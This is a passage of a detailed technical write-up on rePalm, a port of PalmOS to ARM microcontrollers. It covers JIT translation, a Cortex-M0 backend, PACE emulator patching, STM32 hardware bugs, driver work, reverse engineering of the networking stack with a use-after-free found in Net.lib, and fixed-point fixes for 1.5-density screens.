After the JIT worked, I rewrote it. The initial version was full of magic values and holes (cases that could happen in legitimate code but would be mistranslated). It also sometimes emitted invalid opcodes that the Cortex-M4 would still execute (despite the docs saying they were not allowed). The JIT was split into two pieces. The first was the frontend, which ingested ARM instructions, maintained the TC, and kept track of various other state. The second was the backend. The backend had a function for each possible ARMv5 addressing mode or instruction format, and given ANY valid ARMv5 instruction, it could produce a sequence of ARMv7-M instructions to perform the same task. For common cases the sequence was well optimized; for uncommon ones, it was not. However, the backend handles ANY possible valid ARMv5 request, even insane things like, for example, RSBS PC, SP, PC, ROR SP . No sane person would ever produce this instruction, but the backend will properly translate it. I wrote tests and ran them automatically to verify that all possible inputs are handled, and correctly so. I also optimized the hottest path in the whole system - the emulation of the BLX instruction in Thumb. It is now a whopping 50 cycles faster, which noticeably improved performance. As an extra small optimization, I noticed that oftentimes Thumb code would use a BLX simply to jump to an OsCall (which, due to using R12 and R9, cannot be written in Thumb mode). The new BLX handler detects this and skips emulation by calling the requisite OsCall directly.

I then wrote a sub-backend for the EDSP extension (ARMv5E instructions), since some Sony apps use them. The reason for a separate sub-backend is that ARMv7E-M (Cortex-M4) has instructions we can use to translate EDSP instructions very well, while ARMv7-M (Cortex-M3) does not, and requires longer instruction sequences to do the same work. rePalm supports both.

Later, I went back and, despite it being a huge pain, worked out a way to use the IT instruction on Cortex-M3 and up. This resulted in a huge amount of code refactoring - basically pushing a "condition code" parameter to every backend function and expecting it to conditionalize itself however it wishes. This produced a change with an over-4000-line diff, but it works very well and resulted in a noticeable speed increase!

The Cortex-M0 backend

Why this is insane

It was quite an endeavor, but I wanted to see if I could make a working Cortex-M0 backend for my JIT. The Cortex-M0 executes the ARMv6-M instruction set. This is basically just Thumb-1, with a few minor additions. Why is this scary? In Thumb-1, most instructions only have access to half the registers (r0..r7). Only three instructions have access to the high registers: CMP , MOV , and ADD . Almost all Thumb-1 instructions always set flags. There are also no long-multiply instructions in Thumb-1. And there is no RRX rotation mode at all. The confluence of all these issues makes attempting a one-to-one instruction-to-instruction translation from ARM to Thumb-1 a non-starter.

To make it all work, we'll need some temporary working space: a few registers. It is all doable with three with a lot of work, and comfortable with four, so I decided to use four work registers. We'll also need a register to point to our context (the place where we'll store extra state). And, for speed, we'll want a reg to store the virtual status register. Why do we need one of those? Because almost all of our Thumb-1 instructions clobber flags, whereas the ARM code we're translating expects flags to stick around during long instruction sequences. So our total is 6. We need 6 registers. They need to be low registers since, as we discussed, high registers are basically useless in Thumb-1.

The basics

Registers r0 through r3 are temporary work registers for us. The r4 register is where we keep our virtual status register, and r5 points to our context. We use r12 as another temporary. Yes, it is a high reg, but sometimes we really just need to stash something, and only being able to MOV something in and out of it is enough. So, what's in a context? Well, the state of the virtual r0 through r5 registers, as well as the virtual r12 and the virtual lr register. There obviously needs to be a separate context for every thread, since they may each run different ARM code. We allocate one the first time a thread runs ARM code (it is actually part of the JIT state, and we copy it if we reallocate the JIT state).
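
As a sketch, the context could look something like this (the struct and field names are my illustration; the real thing is part of the JIT state):

#include <stdint.h>

// Sketch of the per-thread Cortex-M0 JIT context described above: real
// r0..r3 are work registers, real r4 holds the virtual status register,
// and real r5 points at this structure.
struct M0JitContext {
    uint32_t virtR0thru5[6]; // virtual r0..r5 (the real ones are in use)
    uint32_t virtR12;        // virtual r12
    uint32_t virtLR;         // virtual lr
    // ...plus copies of the shared prologue/epilogue code that TUs call
    // instead of inlining them (see below).
};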

"But," you might say, "if PalmOS's Thumb code expects register values in registers, and our translated ARM code keeps some of them in a weird context structure, how will they work together?" This is actually complex. Before every translation unit, we emit a prologue. It will save the registers from our real registers into the context. At the end of every translation unit, we emit an epilogue that restores registers from the context into the real registers. When we generate jumps between translation units, we jump past these pieces of code, so as long as we are running in the translated code, we take no penalty for saving/restoring contexts. We only need to take that penalty when switching between translated code and real Thumb code. Actually, it turns out that the prologue and epilogue are large enough that emitting then inside every TU is a huge waste of space, so we just keep a copy of each inside a special place in the context, and have each TU just call them as needed. A later speed improvement I added was to have multiple epilogues, based on whether we know that the code is jumping to ARM code, Thumb code, or "not sure which". This allows us to save a few cycles on exiting translated code. Every cycle counts!

Fault dispatching

There is just one more problem: those BLX instructions in Thumb mode. If you remember, I wrote about how they do not exist in ARMv7-M. They do not exist in ARMv6-M either. So we also need to emulate them. But, unlike ARMv7-M, ARMv6-M has no real fault handling ability. All faults are considered unrecoverable and cause a HardFault to occur. Clearly something had to be done to work around that. This actually led to a rather large side-project, which I published separately: m0FaultDispatch . In short: I found a way to completely and correctly determine the fault cause on the Cortex-M0, and recover as needed from many types of faults, including invalid memory accesses, unaligned memory accesses, and invalid instructions. With this final puzzle piece found, the Cortex-M0 JIT was functional.

Is PACE fast enough?

Those indirect jumps...

Unfortunately, emulation almost always involves a lot of indirect jumps. Basically, that is how one does instruction decoding. 68k being a CISC architecture with variable-length instructions means that the decoding stage is complex. PACE 's emulator is clearly hand-written in assembly, with some tricks. It is all ARM. It is actually the same, instruction-for-instruction, from PalmOS 5.0 to PalmOS 5.4. The surrounding code changed, but the emulator core did not. This is actually good news - it means it was good as is. My JIT properly and correctly handles translating PACE , as evidenced by the fact that rePalm works on ARMv7-M. The main problem is that every instruction emulated requires at least one indirect jump (for common instructions), two for medium-commonness ones, and up to three for some rare ones. Due to how my JIT works, each indirect jump that is not a function return requires an exception to be taken (14 cycles in, 12 out), some glue code (~30 cycles), and a hash lookup (~20 cycles). So even in the case that the target code has been translated, this adds 70-ish cycles to each indirect jump. This puts a ceiling on the efficiency of the 68k emulator at roughly 1/70th of native speed. Not great. PACE usually is about 1/15 the speed of native code, so that is quite a slowdown. I considered writing a better translation just for PACE , but it is quite nontrivial to do fast. Simply put, there isn't a simple fast way to translate something like LDR R0, [R11, R1, LSL #2]; ADD PC, R11, R0 . There simply is no way to know where that jump will go, or even that R11 points to a location that is immutable. Sadly, that is what PACE 's top-level dispatch looks like.

A special solution for a special problem

I had already fulfilled my goal of running PalmOS unmodified - PACE does work with my JIT, and the OS is usable and not slow - but I wanted a better solution, and decided that PACE is a unique-enough problem to warrant it. The code emulator in PACE has a single entry point, and only calls out to other code in 10 clear cases: Line1010 (instructions starting with 0xA), Line1111 (instructions starting with 0xF), TRAP0, TRAP8, TRAPF (OsCall), division by zero, illegal instruction, unimplemented instruction, the Trace bit being set, and hitting a PC value of precisely 0xFFFFFFF0. So what to do? I wrote a tool, "patchpace", that will take in a PACE.prc from any PalmOS device, analyze it to find where those handlers are in the binary, and find the main emulator core. It will then replace the core (in place if there is enough space, appended to the binary if not) with code you provide. The handler addresses will be inserted into your code at offsets the header provides, and a jump to your code will be placed where the old emulator core was. The header is very simple (see "patchpace.c") and just includes halfword offsets from the start of the binary to the entry point, and to the places where jumps to each of the abovementioned handlers are to be inserted as BL or BLX instructions. The only param to the emulator is the state. It is structured thusly: the first word is free for the emulator to use as it pleases, then the 8 D-regs, then the 8 A-regs, then PC, and then SR. No further data is allowed (PACE uses the data after this point). This same state must be passed to all the handlers. The TRAPF handler also needs the next word passed to it (the OsCall number). Yes, you understand this correctly: this allows you to bring your own 68k emulator to the party. Any 68k emulator will do, and it does not need to know anything about PalmOS at all. Pretty sweet!
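
In C terms, the state layout just described would look like this (the struct name is mine; the field order is as described above):

#include <stdint.h>

// The register state a patchpace-injected emulator core receives,
// matching the layout described above.
struct PaceEmuState {
    uint32_t scratch; // first word: free for the emulator's own use
    uint32_t d[8];    // 68k D0..D7
    uint32_t a[8];    // 68k A0..A7
    uint32_t pc;      // 68k program counter
    uint32_t sr;      // 68k status register
    // nothing may be added past here - PACE owns the following bytes
};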

Any 68k emulator...

So where do we get us a 68k emulator? Well, anywhere! I wrote a simple one in C to test this idea, and it worked well, but really, for this sort of thing, you want assembly. I took PACE's emulator as a style guide, and did a LOT of work to produce a Thumb2 68k emulator. It is much more efficient than PACE ever was. This is included in the "mkrom" folder as "PACE.0003.patch". As stated before, this is entirely optional and not required. But it does improve raw 68k speed by about 8.4x in the typical case.

But, you promised hardware...

Hardware has bugs

I needed a dev board to play with. The STM32F429 Discovery board seemed like a good start. It has 8MB of RAM, which is enough, 2MB of flash, which is good, and a display with a touchscreen. Basically, it is perfect on paper. Oh, if only I knew how imperfect the reality is. Reading the STM32F429 reference manual, it does sound like the perfect chip for this project. And ST does not quite go out of their way to tell you where to find the problems. The errata sheet is damning. Basically, if you make the CPU run from external memory, put the stack in external memory, and the SDRAM FIFO is on, exceptions will crash the chip (incorrect vector address read). OK, I can work around that - just turn off the FIFO. Next erratum: same story, but if the FIFO is off, sometimes writes will be ignored and not actually write. Ouchy! Fine! I'll move my stacks to internal RAM. It is quite a re-architecting, but OK, fine! Still crashes. No errata about that! What gives? I removed rePalm and created a 20-line repro scenario. This is not in ST's errata sheet, but here is what I found: if PC points to external RAM, and the WFI instruction is executed (to wait for interrupts in a low power mode), and then an interrupt happens after more than 60ms, the CPU will take a random interrupt vector instead of the correct one after waking up! Just imagine how long that took to figure out! How many sleepless nights ripping my hair out at random crashes in interrupt handlers that simply could not possibly be executing at that time! I worked around this by not using WFI. Power is obviously wasted this way, but this is OK for development for now, until I design a board with a chip that actually works!

Next issue: RAM address. The STM32F429 supports two banks of external RAM: 0 and 1. Bank 0 starts at 0xC0000000 and Bank 1 at 0xD0000000 . This is a problem because PalmOS needs both RAM and flash to be below 0x80000000 . Well, we're lucky: RAM Bank 0 is remappable to 0x00000000 . Sweet... until you realize that whoever designed this board hated us! The board only has one RAM chip connected, so logically it is Bank 0, right? Nope! It is Bank 1, and that one is not remappable. Well, damn! Now we're stuck, and this board is unusable for booting PalmOS. The 0x80000000 limit is rather set in stone.

So why the 0x80000000 limit?

PalmOS has two types of memory chunks: movable and nonmovable. This is what an OS without access to an MMU does to avoid too much memory fragmentation. Basically when a movable chunk is not locked, the OS can move it, and one references it using a "handle". One can then lock it to get a pointer, use it, and then unlock when done. So what has this got to do with 0x80000000 ? PalmOS uses the top bit of a pointer to indicate if it is a handle or an actual pointer. The top bit being set indicates a handle, clear indicates a pointer. So now you see that we cannot really live with RAM and ROM above 0x80000000 . But then again, maybe...
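
The check itself is trivial, which is exactly why it is scattered all over the OS. A sketch of the disambiguation (my function name, not PalmOS's):

#include <stdbool.h>
#include <stdint.h>

// Sketch: PalmOS-style handle-vs-pointer disambiguation. With RAM and
// ROM below 0x80000000, a set top bit can only mean "handle".
static bool refIsHandle(uint32_t ref)
{
    return (ref & 0x80000000u) != 0;
}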

Two wrongs do not make a right, but do two nasty hacks?

Given that I've already decided that this board was only for temporary development, why not go further? Handle-vs-pointer disambiguation is only done in a few places. Why not patch them to invert the condition? At least for now. No, not at runtime. I actually disassembled and hand-patched 58 places total. Most were in Boot , where the MemoryManager lives; a few were in UI , since the code for text fields likes to find out if a pointer passed to it is a pointer (noneditable) or a handle (editable). There were also a few in PACE , since m68k had a SysTrap to determine the kind of pointer, which PACE implemented internally. Yes, this is no longer "unmodified PalmOS", but this is only temporary, so I am willing to live with it! But, you might ask, didn't you also say that ROM and RAM both need to be below 0x80000000 ? If we invert the condition, we need them both above. But flash is at 0x08000000 ... Oops. Yup, we cannot use flash anymore. I changed the RAM layout again, carving out 2MB at 0xD0600000 to be the fake "ROM", and I copy the flash contents to it at boot. It works!

Tales of more PalmOS reverse engineering

SD-card Support

Luckily, I had written a slot driver for PalmOS before, so writing an SD card driver was not hard. In fact, I reused some PowerSDHC source code! rePalm supports SD cards now on the STM32F469 dev board. On the STM32F429 board, they are also supported, but since the board lacks a slot, you need to wire them up yourself (CLK -> C12, CMD -> D2, DAT_0 -> C8). Due to how the board is already wired, only a one-bit-wide bus will work (DAT_1 and DAT_2 are used for other things and cannot be remapped to other pins), so that limits the speed. Also, since your wires will be long and floppy, the maximum speed is further limited. This means that on the STM32F429 the speed is about 4Mbit/sec. On the STM32F469 board the speed is a much more respectable 37Mbit/sec. Higher speeds could be reached with DMA, but this is good enough for now. While writing the SD card support for the STM32F4 chips, I found a hardware bug, one that was very hard to debug. The summary is this: the SD bus allows the host to stop the clock anytime. So the controller has a function to stop it anytime it is not sending commands or sending/receiving data. Good so far. But the data lines can also be used to signal that the card is busy. Specifically, the DAT_0 line is used for that. The problem is that most cards use the clock line as a reference as to when they can change the state of the DAT lines. This means that if you do something that the card can be busy after, like a write, and then shut down the clock, the card will keep the DAT_0 line low forever, since it is waiting for the clock to tick to raise it. "So," you will ask, "why not enable clock auto-stopping except for this one command?" That does not work, since clock auto-stopping cannot be easily flipped on and off. Somehow it confuses the module's internal state machine if it is flipped while the clock is running. So, why stop the clock at all? Minor power savings. Definitely not enough to warrant this mess, so I just disabled the auto-stopping function. A week to debug, and a one-line fix! The slot driver can be seen in the "slot_driver_stm32" directory.

Serial Port Support

Palm Inc did document how to write a serial port driver for PalmOS 4. There were two types: virtual drivers and serial drivers. The former was for ports that were not hardwired to the external world (like the port connected to the Bluetooth chip or the infrared port), and the latter for ports that were (like the cradle serial port). PalmOS 5 merged the two types into a unified "virtual" type. Sadly, this was not documented. It borrowed from both port types in PalmOS 4. I had to reverse engineer the OS for a long time to figure it out. I produced a working idea of how this works on PalmOS 5, and you can see it in the "vdrvV5.h" include file. This information is enough to produce a working driver for a serial port, an IrDA SIR port, and USB for HotSync purposes.

Actually making the serial port work on the STM32F4 hardware was a bit hard. The hardware has only a single one-byte buffer. This means that to not lose any received data at high data rates, one needs to use hardware flow control, or make the serial port interrupt the highest priority and hope for the best. This was unacceptable to me. I decided to use DMA. This was a fun chance to write my first PalmOS 5 library that can be used by other libraries: I wrote a DMA library for STM32F4-series chips. The code is in the "dma_driver_stm32" directory. With this, one would think that all would be easy. No. DMA needs to know how many bytes you expect to receive. In the case of generic UART data receive, we do not know this. So how do we solve this? With cleverness. DMA can interrupt us when half of a transfer is done, and again when it is all done. DMA can be circular (restart from the beginning when done). This gets us almost as far as we need to go. Basically, as long as data keeps arriving, we'll keep getting one of these interrupts, and then the other, in order. In our interrupt handler, we just need to see how far into the buffer we are, and report the bytes received since the last time we checked as new data. As long as our buffer is big enough that it does not overflow in the time it takes us to handle these interrupts, we're all set, right? Not quite. What if we get just one byte? This is less than half a transfer, so we'll never get an interrupt at all, and thus will never report this to the clients. This is unacceptable. So what do we do? The STM32F4 UART has an "IDLE detect" mode. This will interrupt us if, after a byte has been RXed, four bit times have expired with no further character starting. This is basically just what we need. If we wire this interrupt to our previous handling code for the circular buffer, we'll always be able to receive data as fast as it comes, no matter the size. Cool! The serial driver I produced does this, and can be seen in the "uart_driver_stm32" directory. I was able to successfully HotSync over it! IrDA is supported too. It works well. See the photo album for a video demo!
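
The heart of the scheme fits in a few lines. A minimal sketch (names are illustrative, not the actual driver's), called from the half-transfer, transfer-complete, and IDLE interrupts alike:

#include <stdint.h>

extern void reportRxByte(uint8_t byte); // hypothetical client callback

struct UartRxState {
    volatile uint8_t *buf; // circular DMA target buffer
    uint32_t bufSize;      // its size in bytes
    uint32_t readPos;      // where we last stopped reading
};

// Sketch: on any of the three interrupts, the DMA's remaining-count
// register tells us where the hardware's write position is; every byte
// between our read position and there is new data.
static void uartRxDrain(struct UartRxState *st, uint32_t dmaRemaining)
{
    uint32_t writePos = st->bufSize - dmaRemaining;

    while (st->readPos != writePos) {
        reportRxByte(st->buf[st->readPos]);  // hand the byte to clients
        st->readPos = (st->readPos + 1) % st->bufSize;
    }
}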

Yes, you can try it!

If you want to try it, on the STM32F429 Discovery board, the unpopulated 0.1-inch hole labelled "RX" is the STM32's transmit (yes, I know, a weird label for a transmit pin). B7 is the STM32's receive pin. If you connect a USB-to-serial adapter there, you can HotSync over serial. If you instead connect an IrDA SIR transceiver there, you'll get working IR. I used the MiniSIR2 transceiver from Novalog, Inc. It is the same one most Palm devices use.

Vibrate & LED support

Vibration and LED support were never documented, since those are hardware features that vendors handle. Luckily, I had reverse engineered this a long time ago, when I was adding vibration support to the T|X. Turns out that I almost got it all right back then. A bit more reverse engineering yielded the complete proper API. LED follows the same API as the vibrator: one "GetAttributes" function and one "SetAttributes" function. The settable things are the pattern, speed, delay between repetitions, and number of repetitions. The OS uses them as needed and automatically adds "Vibrate" and "LED" settings to the "Sounds and Alerts" preferences panel if it notices that the hardware is supported. And rePalm now supports both! The code is in "halVibAndLed.c"; feel free to peruse it at your leisure.

Networking support (WIP)

False starts

I really wanted to add support for networking to rePalm. There were a few ways I could think of to do that such that all existing apps would work. One could simply replace Net.lib with one with a similar interface but controlled by me. I could then wire it up to any interface I wanted, and all would be magical. This is a poor approach. To start with, while large parts of Net.lib are documented, there are many parts that are not. Having to figure them out would be hard, and proving correctness and staying bug-compatible even more so. Then there is the issue of wanting to run an unmodified PalmOS. Replacing random libraries diminishes the ability to claim that. No, this approach would not work. The next possibility was to make a fake serial interface, and tell PalmOS to connect via it, over SLIP or PPP, to a fake remote machine. The other end of this serial port could go to a thread that talks to our actual network interface. This can be made to work. There would be the overhead of encoding and decoding PPP/SLIP frames, and the UI would be confusing and all wrong. Also, I'd need to find ways to make the config UI work. This is also quite a mess. But at least this mess is achievable. But maybe there is a better approach?

The scary way forward

Conceptually, there is a better approach. PalmOS's Net.lib supports pluggable network interfaces (I call them NetIF drivers). You can see a few on all PalmOS devices: PPP, SLIP, Loopback. Some devices also have one for WiFi or cellular. So all I have to do is produce a NetIF driver. Sounds simple enough, no? Just as you'd expect, the answer is a strong, resounding, and unequivocal "no!" Writing NetIF drivers was never documented. And a network interface is a lot harder than a serial port driver (which was the previous plug-in driver interface of PalmOS that I had reverse engineered). Reverse engineering this would be hard.

Those who study history...

I started with some PalmOS 4.x devices and looked at the SLIP/PPP/Loopback NetIF drivers. Why? Like I mentioned earlier, in 68k code the compiler tends to leave function names around in the binary unless this is turned off. This is a huge help in reverse engineering. Now, do not let this fool you: function names alone are not that much help. You still need to guess structure formats, parameters, etc. Thus, despite the fact that Net.lib and the NetIF driver interface both changed between PalmOS 4.x and PalmOS 5.x, figuring out how NetIF drivers worked in PalmOS 4.x would still provide some foundational knowledge. It took a few weeks until I thought I had that knowledge. Then I asked myself: "Was there a PalmOS 4.x device with WiFi?" Hm... There was. The AlphaSmart Dana Wireless had WiFi. Now that I thought I had a grip on the basics of how these NetIF drivers worked, it was time to look at a more complex one, since PPP, SLIP, and Loopback are all very simple. Sadly, AlphaSmart's developers knew how to turn off the insertion of function names into the binary. Their WiFi driver was still helpful, but it took weeks of massaging to make sense of it. It is approximately at this point that I realized that Net.lib had many versions and I had to look at others. I ended up disassembling each version of Net.lib that existed to see the evolution of the NetIF driver interface and Net.lib itself. Thus I looked at the Palm V's version, the Palm Vx's, the Palm m505's, and the Dana's. The most interesting changes came with v9, where support for ARP & DHCP was merged into Net.lib , whereas previously each NetIF driver that needed them embedded its own logic for them.

On to OS 5's Net.lib

This was all nice and great, but I was not really in this to understand how NetIF drivers worked in PalmOS 4.x. Time had come to move on to reverse-engineering how PalmOS 5.x did it. I grabbed a copy of Net.lib from the T|T3, and started tracing out its functions, matching them up to their PalmOS 4.x equivalents. It took a few more weeks, but I more or less understood how PalmOS 5.x Net.lib worked.

I found a bug!

Along the way I found an actual bug: a use-after-free in arp_close() .

NETLIB_T3:0001F580     CMP  R4, #0        ; linked list is empty?
NETLIB_T3:0001F584     BEQ  loc_1F5A4     ; if so, just skip this entire thing
NETLIB_T3:0001F588     B    loc_1F590     ; else go free it one-by-one
NETLIB_T3:0001F58C
NETLIB_T3:0001F58C loc_1F58C:
NETLIB_T3:0001F58C     BEQ  loc_1F598     ; this instr here is harmless, but makes no sense! We only get here on "NE" condition
NETLIB_T3:0001F590
NETLIB_T3:0001F590 loc_1F590:
NETLIB_T3:0001F590     MOV  R0, R4        ; free the node
NETLIB_T3:0001F594     BL   MemChunkFree  ; after this, memory pointed to by R4 is invalid (freed)
NETLIB_T3:0001F598
NETLIB_T3:0001F598 loc_1F598:
NETLIB_T3:0001F598     LDR  R4, [R4]      ; load "->next" from now-invalid memory...
NETLIB_T3:0001F59C     CMP  R4, #0        ; see if it is NULL
NETLIB_T3:0001F5A0     BNE  loc_1F58C     ; and if not, loop to free that node too
NETLIB_T3:0001F5A4
NETLIB_T3:0001F5A4 loc_1F5A4:

Well, that was easy...

Then I started disassembling the PalmOS 5.x SLIP/PPP/Loopback NetIF drivers to see how they had changed from PalmOS 4.x. I assumed that nobody really changed their logic, so any changes I saw could be hints about changes in the Net.lib and NetIF structures between PalmOS 4.x and PalmOS 5.x. It turned out that not that much had changed. Structures got realigned, a few attribute values got changed, but otherwise it was pretty close. It is at this point that I congratulated myself, and decided to start writing my own NetIF driver to test my understanding.

NOT!

The self-congratulation did not last long. It turned out that in my notes I had marked a few things I thought inconsequential as "to do: look into this later". Well, it appears that they were not inconsequential. For example: the callback from DHCP to the NetIF driver to notify it of DHCP status was NOT purely informative as I had thought, and in fact a large amount of logic has to exist inside it. That logic, in turn, touches the insides of the DhcpState structure, half of which I had not fully understood, since I thought it was opaque to the NetIF driver. Damn. Well, back to IDA and more reverse engineering. At some point here, to understand what the various callbacks between Net.lib and the NetIF driver did, I realized that I needed to understand DHCP and ARP a lot better than I did. After sinking some hours into reading the DHCP and ARP RFCs, I dove back into the disassembled code. It all sort of made sense. I'll summarize the rest of the story: it took another three weeks to document every structure and function that the ARP and DHCP code uses.

More reverse engineering

There was just one more thing left. As the NetIF driver comes up, it is expected to show UI and call back into Net.lib at various times. The different NetIF drivers I disassembled did this in very different ways, so I was not clear as to what the proper way to do this was. At this point I went to my archive of all the PalmOS ROMs, and wrote a tool to find all the files with the type neti (NetIF drivers have this type), skip all that are PPP, SLIP, or Loopback, and copy the rest to a folder, after deduplicating them. I then disassembled them all, producing diagrams and notes about how each brought itself up and down, where UI was shown or hidden, and when each step was taken. While doing this, I saw some (but not much) logging in some of these drivers, so I was able to replace my own names for various values and structs with the proper ones that the writers of those NetIF drivers were kind enough to leak in their log statements. I ended up disassembling: Sony's "CFEtherDriver" from the UX50, Hagiwara's WiFi Memory Stick driver "HNTMSW_neti", Janam's "WLAN NetIF" from the XP30, Sony's "CFEtherDriver" from the TH55, PalmOne's "PxaWiFi" from the Tungsten C, PalmOne's "WiFiLib" from the TX, and PalmOne's "WiFiLib" from their WiFi SD card. Phew, that was a lot! Long story short: the reverse-engineered NetIF interface is documented in "netIfaceV5.h", and it is enough that I think a working NetIF driver can be written using it.

"You think?" you might ask, "have you not tested it?". Nope, I am still writing my NetIF driver so stay tuned...

1.5 density support

Density basics

Badly rendered PalmOS

PalmOS has had support for multiple screen densities since version 4.2. That is to say that one could have a device with a screen of the same size, but with more pixels in it, and still see things rendered at the same size, just with more detail. Sony did have high-res screens before Palm, and HandEra did before both of them, but Palm's solution was the first OS-scale one, so that is the one that PalmOS 5 used. The idea is simple. Each Bitmap/Window/Font/etc has a coordinate system associated with it, and all operations use that to decide how to scale things. 160x160 screens were termed 72ppi (no relation to actual points or inches), and the new 320x320 ones were 144ppi (double density). This made life easy - when the proper-density image/font/etc was missing, one could pixel-double the low-res one. The reverse worked too. Pen coordinates also had to be adjusted, of course, since now the developer could request to work in a particular coordinate system, and the whole system API then had to comply.

How was this implemented? A few coordinate systems are always in play: native (what the display is), standard (UI layout uses this), and active (what the user set using WinSetCoordinateSystem ). So, given three systems, there are at any point in time 6 scaling factors to convert from any one to any other. PalmOS 5.0 used just one. This was messy, and we'll not talk about it further. Let's just say this solution did not stick. PalmOS 5.2 and later use 4 scaling factors, representing bidirectional transforms between active and native, and between native and standard. Why not the third pair? It is used uncommonly enough that doing two transformations is OK.

Since floating-point math is slow on ARMv5, fixed-point numbers are used. Here there is a difference between PalmOS 5.2 and PalmOS 5.4. The former uses 16-bit fixed-point numbers in 10.6 format, the latter uses 32-bit numbers in 16.16 format. I'll let you read up about fixed-point numbers on your own time, but the crux of the matter is that the number of fraction bits limits the precision of the number itself and the math you can do with it. Now, for precise powers of two, one does not need that many bits, so while there were only 72ppi and 144ppi screens, 10.6 was good enough, with scale factors always being 0x20 (x0.5), 0x40 (x1.0), and 0x80 (x2.0).

PalmOS 5.4 added support for one-and-a-half density due to the overabundance of cheap 320x240 displays at the time. This new resolution was specified as 108ppi, or precisely 1.5 times the standard resolution. Technically, everything in PalmOS 5.2 will work as is, and if you give PalmOS 5.2 such a screen, it will more or less sort of work. To the right you can see what that looks like. Yes, not pretty. But it does not crash, and things sort of work as you'd expect. So why does it look like crap? Well, that scaling thing. Let's see what scale factors we might need now. First of all, PalmOS will not ever scale between 108 and 144ppi for bitmaps or fonts, so those scale factors are not necessary (rePalm will in one special case: to draw 144ppi bitmaps on a 108ppi screen, when no 72ppi or 108ppi bitmap is available). So the only new scale factors introduced are between the standard and 1.5 densities. From standard to 108ppi the scale factor is 1.5, which is representable as 0x60 in 10.6 fixed-point format. So far so good: that is exact, and the math will work perfectly every time. But from 108ppi to 72ppi the scale factor is 2/3, which is NOT representable exactly in binary (no matter how many bits of precision you have).

The simple rule with fixed-point math is that when your numbers are not representable exactly, your rounding errors will accumulate to more than one once the values you operate on are greater than one over your LSB. For 10.6, the LSB is 1/64, so once we start working with numbers over 64, rounding will have errors of over one. This is a problem, since PalmOS routinely works with numbers over 64 when doing UI. Hell, the screen's standard-density width is 160. Oops... These accumulated rounding errors are what you see in that screenshot. Off by one here, off by one there, they add up to that mess. 108ppi density became officially supported in PalmOS 5.4. So what did they do to make it work? Switch to 16.16 format. The LSB there is 1/65536, so math on numbers up to 65536 will round correctly. This is good enough, since all of PalmOS UI uses 16-bit numbers for coordinates.
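
You can see the difference with a two-line experiment. Below, the 108ppi coordinate 240 (which should map to exactly 160 at 72ppi) is scaled by 2/3 in both formats; this is my demo, not OS code:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint32_t coord = 240;
    uint32_t k106 = 43;     // 2/3 rounded to 10.6 format:  43/64
    uint32_t k1616 = 43691; // 2/3 rounded to 16.16 format: 43691/65536

    // 10.6 prints 161 - off by one! 16.16 prints 160 - correct.
    printf("10.6:  %u\n", (unsigned)((coord * k106) >> 6));
    printf("16.16: %u\n", (unsigned)((coord * k1616) >> 16));
    return 0;
}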

How does it all fall apart?

So why am I telling you all this? Well, PalmOS 5.4 has a few other things in it that make it undesirable for rePalm (rePalm can run PalmOS 5.4, but I am not interested in supporting it), mainly NVFS, which is mandatory in 5.4. I wanted PalmOS 5.2 to work, but I also wanted 1.5 density support, since 320x240 screens are still quite cheap, and in fact my STM32F427 dev board sports one. We cannot just take Boot.prc from PalmOS 5.4 and move it over, since that also brings NVFS. So what to do? I decided to take an inventory of every part of the OS that uses these scaling values. They are hidden inside the "Window" structure, so mostly this was inside Boot . But there are other ways to fuck up. For example, in a few places in UI , sequences like this can be seen: BmpGetDensity( WinGetBitmap( WinGetDisplayWindow())) . This is clearly a recipe for trouble, because code that was never written to see anything other than a 72 or a 144 as a reply is about to see a 108. Some of that is harmless, if no math is being done with it. It can be quite harmful, however, if it is used in math. I disassembled the Boot from a PalmOS 5.4 device (Treo 680) and one from a PalmOS 5.2 device (Tungsten T3). For each place I found in the T3 ROM that looked weird, I checked what the PalmOS 5.4 Boot did. That provided most of the places of worry. I then searched the PalmOS 5.4 ROM for any references to 0x6C , as that is 108 in hex, and a very unlikely constant to occur in code naturally for any other reason (luckily). I also looked at every single division to see if coordinate scaling was involved. This produced a complete list of all the places in the ROM that needed help. There were over 150...

How do we fix it?

Patching this many places is doable, but what if tomorrow I decide to use the Boot from another device? No, this was not a good solution. I opted instead to write an OEM extension (a module that the OS will load at boot no matter what) and fix this. But how? If the ROM is read-only, and we do not have an MMU to map a page over the areas we want to fix, how do we fix them? Well, every such place is logically in a function. And every function is sometimes called. It may be called by a timer or a notification, be a thread, or be a part of what the user does. Luckily, PalmOS only expects UI work from the UI thread, so ALL of them were only called from user-facing functions. Sadly, some were buried quite deep. I got started writing replacement functions, basing them on what the Boot from PalmOS 5.4 did. For most functions I wrote full patches (that is, my patch entirely replaces the original function in the dispatch table, never calling back to the original). I wrote 73 of those: FntBaseLine , FntCharHeight , FntLineHeight , FntAverageCharWidth , FntDescenderHeight , FntCharWidth , FntWCharWidth , FntCharsWidth , FntWidthToOffset , FntCharsInWidth , FntLineWidth , FntWordWrap , FrmSetTitle , FrmCopyTitle , CtlEraseControl , CtlSetValue , CtlSetGraphics , CtlSetSliderValues , CtlHandleEvent , WinDrawRectangleFrame , WinEraseRectangleFrame , WinInvertRectangleFrame , WinPaintRectangleFrame , WinPaintRoundedRectangleFrame , WinDrawGrayRectangleFrame , WinDrawWindowFrame , WinDrawChar , WinPaintChar , WinDrawChars , WinEraseChars , WinPaintChars , WinInvertChars , WinDrawInvertedChars , WinDrawGrayLine , WinEraseLine , WinDrawLine , WinPaintLine , WinInvertLine , WinFillLine , WinPaintLines , WinGetPixel , WinGetPixelRGB , WinPaintRectangle , WinDrawRectangle , WinEraseRectangle , WinInvertRectangle , WinFillRectangle , WinPaintPixels , WinDisplayToWindowPt , WinWindowToDisplayPt , WinScaleCoord , WinUnscaleCoord , WinScalePoint , WinUnscalePoint , WinScaleRectangle , WinUnscaleRectangle , WinGetWindowFrameRect , WinGetDrawWindowBounds , WinGetBounds , WinSetBounds , WinGetDisplayExtent , WinGetWindowExtent , WinGetClip , WinSetClip , WinClipRectangle , WinDrawBitmap , WinPaintBitmap , WinCopyRectangle , WinPaintTiledBitmap , WinCreateOffscreenWindow , WinSaveBits , WinRestoreBits , WinInitializeWindow . A few things were a bit too messy to replace entirely. An example of that was PrvDrawControl , a function that makes up the guts of CtlDrawControl but is also used in a lot of places, like event handling for controls. What to do? Well, I can replace all callers of it: FrmHandleEvent and CtlDrawControl . But that does not help, since PrvDrawControl itself has issues and is HUGE and complex. After tracing it very carefully, I realized that it only really cares about density in one special case: when drawing a frame of type 0x4004 , in which case it instead sets the coordinate system to native, draws the frame manually, and then resets the coordinate system. So what I did is set a special global before 